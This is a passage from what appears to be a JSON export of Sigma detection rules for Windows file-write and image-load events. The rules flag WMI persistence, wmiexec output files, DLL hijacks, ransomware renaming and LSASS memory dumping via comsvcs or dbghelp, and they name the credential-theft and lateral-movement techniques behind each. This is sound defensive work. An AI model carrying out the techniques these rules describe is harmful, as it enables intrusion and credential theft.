    "content": "title: WMI Persistence - Script Event Consumer File Write\nid: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4\nstatus: test\ndescription: Detects file writes of WMI script event consumer\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.t1546.003\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: 'C:\\WINDOWS\\system32\\wbem\\scrcons.exe'\n    condition: selection\nfalsepositives:\n    - Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml",
    "content": "title: Wmiexec Default Output File\nid: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb\nstatus: test\ndescription: Detects the creation of the default output filename used by the wmiexec tool\nreferences:\n    - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/\n    - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-03-08\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|re: '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' # Admin$\n        - TargetFilename|re: 'C:\\\\__1\\d{9}\\.\\d{1,7}$' # C$\n        - TargetFilename|re: 'D:\\\\__1\\d{9}\\.\\d{1,7}$' # D$\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: Wmiprvse Wbemcomn DLL Hijack - File\nid: 614a7e17-5643-4d89-b6fe-f9df1a79641c\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: System\n        TargetFilename|endswith: '\\wbem\\wbemcomn.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml",
    "content": "title: UEFI Persistence Via Wpbbin - FileCreation\nid: e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f\nstatus: test\ndescription: Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method\nreferences:\n    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c\n    - https://persistence-info.github.io/Data/wpbbin.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1542.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\wpbbin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml",
    "content": "title: Writing Local Admin Share\nid: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f\nstatus: test\ndescription: |\n    Aversaries may use to interact with a remote network share using Server Message Block (SMB).\n    This technique is used by post-exploitation frameworks.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share\nauthor: frack113\ndate: 2022-01-01\nmodified: 2022-08-13\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1546.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\\\\\\\127.0.0'\n            - '\\ADMIN$\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml",
    "content": "title: Potentially Suspicious Self Extraction Directive File Created\nid: ab90dab8-c7da-4010-9193-563528cfa347\nrelated:\n    - id: 760e75d8-c3b5-409b-a9bf-6130b4c4603f\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of a binary file with the \".sed\" extension. The \".sed\" extension stand for Self Extraction Directive files.\n    These files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\n    Attackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\n    Usually \".sed\" files are simple ini files and not PE binaries.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_executable_detected\ndetection:\n    selection:\n        TargetFilename|endswith: '.sed'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_rename/file_rename_win_ransomware.yml",
    "content": "title: Suspicious Appended Extension\nid: e3f673b3-65d1-4d80-9146-466f8b63fa99\nstatus: test\ndescription: Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.\nreferences:\n    - https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/\n    - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/\nauthor: frack113\ndate: 2022-07-16\nmodified: 2023-11-11\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    category: file_rename\n    definition: 'Requirements: Microsoft-Windows-Kernel-File Provider with at least the KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH keyword'\ndetection:\n    selection:\n        SourceFilename|endswith:\n            - '.doc'\n            - '.docx'\n            - '.jpeg'\n            - '.jpg'\n            - '.lnk'\n            - '.pdf'\n            - '.png'\n            - '.pst'\n            - '.rtf'\n            - '.xls'\n            - '.xlsx'\n        TargetFilename|contains:\n            - '.doc.'\n            - '.docx.'\n            - '.jpeg.'\n            - '.jpg.'\n            - '.lnk.'\n            - '.pdf.'\n            - '.png.'\n            - '.pst.'\n            - '.rtf.'\n            - '.xls.'\n            - '.xlsx.'\n    filter_main_generic:\n        TargetFilename|endswith:\n            # Note: Please add more used extensions by backup or recovery software\n            - '.backup'\n            - '.bak'\n            - '.old'\n            - '.orig'\n            - '.temp'\n            - '.tmp'\n    filter_optional_anaconda:\n        TargetFilename|contains: ':\\ProgramData\\Anaconda3\\'\n        TargetFilename|endswith: '.c~'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Backup software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_clfs_load.yml",
    "content": "title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location\nid: fb4e2211-6d08-426b-8e6f-0d4a161e3b1d\nstatus: experimental\ndescription: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.\nreferences:\n    - https://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/\n    - https://x.com/Threatlabz/status/1879956781360976155\nauthor: X__Junior\ndate: 2025-01-20\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_dll:\n        ImageLoaded|endswith: '\\clfs.sys'\n    selection_folders_1:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n            - '\\Windows\\Temp\\'\n    selection_folders_2:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_dll and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml",
    "content": "title: DLL Loaded From Suspicious Location Via Cmspt.EXE\nid: 75e508f7-932d-4ebc-af77-269237a84ce1\nstatus: test\ndescription: Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations\nreferences:\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmstp.exe'\n        ImageLoaded|contains:\n            # Add more suspicious paths as you see fit in your env\n            - '\\PerfLogs\\'\n            - '\\ProgramData\\'\n            - '\\Users\\'\n            - '\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n        ImageLoaded|endswith:\n            - '.dll'\n            - '.ocx'\n    condition: selection\nfalsepositives:\n    - Unikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml",
    "content": "title: Amsi.DLL Loaded Via LOLBIN Process\nid: 6ec86d9e-912e-4726-91a2-209359b999b9\nstatus: test\ndescription: Detects loading of \"Amsi.dll\" by a living of the land process. This could be an indication of a \"PowerShell without PowerShell\" attack\nreferences:\n    - Internal Research\n    - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\amsi.dll'\n        Image|endswith:\n            # TODO: Add more interesting processes\n            - '\\ExtExport.exe'\n            - '\\odbcconf.exe'\n            # - '\\regsvr32.exe' # legitimately calls amsi.dll\n            - '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml",
    "content": "title: Potential Azure Browser SSO Abuse\nid: 50f852e6-af22-4c78-9ede-42ef36aa3453\nstatus: test\ndescription: |\n    Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\n    An attacker can use this to authenticate to Azure AD in a browser as that user.\nreferences:\n    - https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30\nauthor: Den Iuzvyk\ndate: 2020-07-15\nmodified: 2023-04-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded: 'C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll'\n    filter_main_bgtaskhost:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n        Image|endswith: '\\BackgroundTaskHost.exe'\n        # CommandLine|contains: '-ServerNameBackgroundTaskHost.WebAccountProvider'\n    filter_optional_devenv:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n        Image|endswith: '\\IDE\\devenv.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_onedrive:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n    filter_optional_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml",
    "content": "title: Suspicious Renamed Comsvcs DLL Loaded By Rundll32\nid: 8cde342c-ba48-4b74-b615-172c330f2e93\nstatus: test\ndescription: Detects rundll32 loading a renamed comsvcs.dll to dump process memory\nreferences:\n    - https://twitter.com/sbousseaden/status/1555200155351228419\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2023-02-17\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        Hashes|contains:\n            # Add more hashes for other windows versions\n            - IMPHASH=eed93054cb555f3de70eaa9787f32ebb # Windows 11 21H2 x64\n            - IMPHASH=5e0dbdec1fce52daae251a110b4f309d # Windows 10 1607\n            - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8 # Windows 10 1809\n            - IMPHASH=407ca0f7b523319d758a40d7c0193699 # Windows 10 2004 x64\n            - IMPHASH=281d618f4e6271e527e6386ea6f748de # Windows 10 2004 x86\n    filter:\n        ImageLoaded|endswith: '\\comsvcs.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml",
    "content": "title: CredUI.DLL Loaded By Uncommon Process\nid: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784\nstatus: test\ndescription: Detects loading of \"credui.dll\" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".\nreferences:\n    - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password\n    - https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\n    - https://github.com/S12cybersecurity/RDPCredentialStealer\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2025-12-09\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith:\n              - '\\credui.dll'\n              - '\\wincredui.dll'\n        - OriginalFileName:\n              - 'credui.dll'\n              - 'wincredui.dll'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\SystemApps\\'\n    filter_main_full:\n        Image:\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n            - 'C:\\Windows\\regedit.exe' # This FP is triggered for example when choosing the \"Connect Network Registry\" from the menu\n    filter_optional_opera:\n        Image|endswith: '\\opera_autoupdate.exe'\n    filter_optional_process_explorer:\n        Image|endswith:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n    filter_optional_teams:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\Teams\\'\n        Image|endswith: '\\Teams.exe'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate processes loading those DLLs in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml",
    "content": "title: Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded\nid: bdc64095-d59a-42a2-8588-71fd9c9d9abc\nrelated:\n    - id: 0e277796-5f23-4e49-a490-483131d4f6e1 # Suspicious Loading\n      type: similar\nstatus: test\ndescription: |\n    Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\n    Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\n    As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n    - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\n    - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nauthor: Perez Diego (@darkquassar), oscd.community, Ecco\ndate: 2019-10-27\nmodified: 2022-12-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\dbghelp.dll'\n            - '\\dbgcore.dll'\n        Signed: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml",
    "content": "title: PCRE.NET Package Image Load\nid: 84b0a8f3-680b-4096-a45b-e9a89221727c\nstatus: test\ndescription: Detects processes loading modules related to PCRE.NET package\nreferences:\n    - https://twitter.com/rbmaslen/status/1321859647091970051\n    - https://twitter.com/tifkin_/status/1321916444557365248\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains: \\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml",
    "content": "title: Load Of RstrtMgr.DLL By A Suspicious Process\nid: b48492dc-c5ef-4572-8dff-32bc241c15c8\nrelated:\n    - id: 3669afd2-9891-4534-a626-e5cf03810a61\n      type: derived\nstatus: test\ndescription: |\n    Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\n    This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\n    It could also be used for anti-analysis purposes by shut downing specific processes.\nreferences:\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/\n    - https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\n    - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nauthor: Luc Génaux\ndate: 2023-11-28\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1486\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img:\n        - ImageLoaded|endswith: '\\RstrtMgr.dll'\n        - OriginalFileName: 'RstrtMgr.dll'\n    selection_folders_1:\n        Image|contains:\n            # Note: increase coverage by adding more suspicious paths\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Image|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    condition: selection_img and 1 of selection_folders_*\nfalsepositives:\n    - Processes related to software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml",
    "content": "title: Load Of RstrtMgr.DLL By An Uncommon Process\nid: 3669afd2-9891-4534-a626-e5cf03810a61\nrelated:\n    - id: b48492dc-c5ef-4572-8dff-32bc241c15c8\n      type: derived\nstatus: test\ndescription: |\n    Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\n    This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\n    It could also be used for anti-analysis purposes by shut downing specific processes.\nreferences:\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/\n    - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/\n    - https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/\n    - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nauthor: Luc Génaux\ndate: 2023-11-28\nmodified: 2025-12-08\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1486\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\RstrtMgr.dll'\n        - OriginalFileName: 'RstrtMgr.dll'\n    filter_main_generic:\n        Image|startswith:\n            - C:\\$WINDOWS.~BT\\'\n            - C:\\$WinREAgent\\'\n            - C:\\Program Files (x86)\\'\n            - C:\\Program Files\\'\n            - C:\\ProgramData\\'\n            - C:\\Windows\\explorer.exe'\n            - C:\\Windows\\SoftwareDistribution\\'\n            - C:\\Windows\\SysNative\\'\n            - C:\\Windows\\System32\\'\n            - C:\\Windows\\SysWOW64\\'\n            - C:\\Windows\\WinSxS\\'\n            - C:\\WUDownloadCache\\'\n    filter_main_user_software_installations:\n        Image|startswith: C:\\Users\\'\n        Image|contains|all:\n            - '\\AppData\\Local\\Temp\\is-'\n            - '.tmp\\'\n        Image|endswith: '.tmp'\n    filter_main_admin_software_installations:\n        Image|startswith: C:\\Windows\\Temp\\'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate Windows processes not currently listed\n    - Processes related to software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml",
    "content": "title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE\nid: ec8c4047-fad9-416a-8c81-0f479353d7f6\nstatus: test\ndescription: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library\nreferences:\n    - https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\nauthor: Greg (rule)\ndate: 2022-06-17\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1202\n    - cve.2022-30190\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        ImageLoaded|endswith: '\\sdiageng.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml",
    "content": "title: PowerShell Core DLL Loaded By Non PowerShell Process\nid: 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f\nrelated:\n    - id: 867613fb-fa60-4497-a017-a82df74a172c\n      type: obsolete\n    - id: fe6e002f-f244-4278-9263-20e4b593827f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects loading of essential DLLs used by PowerShell by non-PowerShell process.\n    Detects behavior similar to meterpreter's \"load powershell\" extension.\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/p3nt4/PowerShdll\nauthor: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-11-14\nmodified: 2025-10-07\ntags:\n    - attack.t1059.001\n    - attack.execution\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        - Description: 'System.Management.Automation'\n        - OriginalFileName: 'System.Management.Automation.dll'\n        - ImageLoaded|endswith:\n              - '\\System.Management.Automation.dll'\n              - '\\System.Management.Automation.ni.dll'\n    filter_main_powershell:\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe' # PowerShell 7 preview\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe' # PowerShell 7\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_pwsh_preview:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n        Image|endswith: '\\pwsh.exe'\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\System32\\dsac.exe'\n            - 'C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe'\n            - 'C:\\Windows\\System32\\runscripthelper.exe'\n            - 'C:\\WINDOWS\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n            - 'C:\\Windows\\System32\\SyncAppvPublishingServer.exe'\n            - 'C:\\Windows\\System32\\winrshost.exe'\n            - 'C:\\Windows\\System32\\wsmprovhost.exe'\n            - 'C:\\Windows\\SysWOW64\\winrshost.exe'\n            - 'C:\\Windows\\SysWOW64\\wsmprovhost.exe'\n    filter_main_dotnet:\n        Image|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\'\n        Image|endswith: '\\mscorsvw.exe'\n    filter_optional_sql_server_mgmt:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio'\n            - 'C:\\Program Files\\Microsoft SQL Server Management Studio'\n        Image|endswith: '\\IDE\\Ssms.exe'\n    filter_optional_sql_server_tools:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft SQL Server\\'\n            - 'C:\\Program Files\\Microsoft SQL Server\\'\n        Image|endswith: '\\Tools\\Binn\\SQLPS.exe'\n    filter_optional_citrix:\n        Image|endswith: '\\Citrix\\ConfigSync\\ConfigSyncRun.exe'\n    filter_optional_vs:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_chocolatey:\n        Image|startswith: 'C:\\ProgramData\\chocolatey\\choco.exe'\n    filter_optional_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        Image|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n        # User: 'NT AUTHORITY\\SYSTEM'   # if set, matches all powershell processes not launched by SYSTEM\n    filter_optional_aurora:\n        # This filter is to avoid a race condition FP with this specific ETW provider in aurora\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Used by some .NET binaries, minimal on user workstation.\n    - Used by Microsoft SQL Server Management Studio\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_dll_tttracer_module_load.yml",
